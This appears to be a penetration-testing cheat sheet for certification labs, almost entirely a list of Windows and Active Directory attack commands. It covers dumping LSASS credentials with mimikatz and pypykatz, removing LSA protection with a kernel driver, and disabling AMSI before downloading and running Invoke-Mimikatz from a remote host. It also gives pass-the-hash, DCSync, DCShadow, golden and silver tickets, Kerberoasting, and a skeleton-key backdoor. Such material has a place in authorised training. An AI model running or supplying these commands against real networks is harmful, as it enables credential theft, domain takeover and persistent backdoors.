PoC
Linux
Copy cat proof.txt && whoami && hostname && ip addr
Copy cat local.txt && whoami && hostname && ip addr
Windows
Copy type proof.txt && whoami && hostname && ipconfig
Copy type local.txt && whoami && hostname && ipconfig Catch the Flag
Windows
Copy dir "\proof*.txt" /s
PS> gci -recurse -inculde FILENAME* search credentials or password:
Copy gci -path . -recurse -ea SilentlyContinue -Include *.txt,*.ini,*.yml,*.xml,*.ps1,*.cfg |select-string pass
Linux
Copy find / -type f -iname "flag.txt" 2>/dev/null
Dump Active Directory with PS
Copy [PS] Import-Module ActiveDirectory
[PS] Get-ADObject -LDAPFilter "(&(objectClass=user)(description=*pass*))" -property * | Select-Object SAMAccountName, Description, DistinguishedName Dump with dump.exe
make sure you able to access Lsass or you have managed the bypass LSA Protection to remove protection.
https://github.com/chvancooten/OSEP-Code-Snippets/tree/main/MiniDump
build it with configuration Release, x64, then run in the compromised user with NT AUTHORITY/SYSTEM priviledge.
the result is in the directory C:\Windows\Tasks\lsass.dmp
then use this command to exctract lsass.dmp via kali linux:
Copy pypykatz lsa minidump lsass.dmp or via windows machine:
Copy mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Dump with Mimikatz
ref: https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz
cheatsheet: https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49
copy from: https://kashz.gitbook.io/kashz-jewels/cheatsheet/mimikatz
Bypass LSA Protection
https://blog.cyberadvisors.com/technical-blog/blog/credential-dumping-protections-part-2-bypass-lsa-protection
make sure mimikatz.sys in same folder with mimikatz.exe
run this command:
Copy # detect LSA Protection
# <snip> ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory <snip>
Copy .\mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"
Bypass AV and LSA
make sure the current shell is NT AUTHORITY\SYSTEM
copy mimidrv.sys or mimikats.sys (driver) into the target computer
then create new service
Copy sc create mimidrv binPath= C:\windows\tasks\mimidrv.sys type= kernel start= demand [SC] CreateService SUCCESS
start new service
then you able to load mimikatz into memory with Invoke-Mimikatz
Copy # disabled AMSI
(new-object system.net.webclient).downloadstring('http://192.168.x.y/amsi.txt') |IEX
# invoke-mimikatz with powershell
(new-object system.net.webclient).downloadstring('http://192.168.x.y/Invoke-Mimikatz.ps1') |IEX Disable LSA Protection
Copy Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`"" if success:
Copy # mimikatz(powershell) # !processprotect /process:lsass.exe /remove
# Process : lsass.exe
PID 123 -> 00/00 [0-0-0] Now you able to interact with Lsass.
[Important to start first] Test Mimikatz
Copy privilege::debug
# Privilege '20' OK => Working properly Password / hashes
Copy # dump logon users pass or ntlm hash
sekurlsa::logonpasswords
# dump hashes
lsadump:sam
lsadump::lsa [/inject | /patch]
# hashcat -m 1000 <hash> Escalate privilege using NTLM Hash
ref: https://www.youtube.com/watch?v=NeY7OiQTRK8
Copy # get NTLM hash of Administrator from `securlsa::logonpasswords
sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:<ntlm hash> /run:cmd
DCsync (Priviledge Escalation AD)
[requirement] user must have permission to domain:
Replication Directory Changes
Replication Directory Changes All
Copy lsadump::dcsync /user:krbtgt
lsadump::dcsync /user:administrator [recommended to start] Elevate shell integrity
Copy # use when using evil-winrm, we get medium integrity shells
token::elevate DCshadow
Copy #simple poc
lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:description /value:"modified dcshadow" Attack DCshadow and DCsync (persistence domain admin / AD Attribute Takeover)
https://www.elladodelmal.com/2018/03/dcshadow-y-dcsync-enganando-al-domain.html
Use case:
Copy # set update attribute
token::elevate
lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:telephoneNumber /value:"123-123-223"
# Power up other mimikatz shell to push
lsadump::dcshadow /push
Golden / Silver Ticket
Copy # dump hash and SID
lsadump::lsa /inject /name: [krbtgt | DOMAIN_ADMIN_ACCOUNT | SERVICE_ACCOUNT]
# create golden ticket and pass-the-ticket
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500 /ptt
# create silver ticket and pass-the-ticket
kerberos::golden /user:<USER> /domain:DOMAINM /sid:SID /krbtgt:SERVICE_NTLM_hash /id:1103 /ptt
# check
misc::cmd
dir \\IP\c$ [/user:USER PASS]
PsExec.exe \\IP cmd.exe
# Kerberoasing attack
# ref: https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html
kerberos::list /export
# download ticket in C:\kerberoast and crack with tgsrepcrack.py
Kerberos Skeleton key
Install backdoor to memory, and make all user can use same password "mimikatz".
note: if the machine was reboot, this backdoor can't exists.
Copy misc::skeleton
# done, now accessing admin share
> net use C:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
> dir \\Desktop-1\c$ /user:Machine1 mimikatz
Get DNS Zone
Copy cd C:\Windows
PS> gci -recurse -inculde <DOMAIN>*
Online request server:
https://beeceptor.com/
Last updated 3 months ago
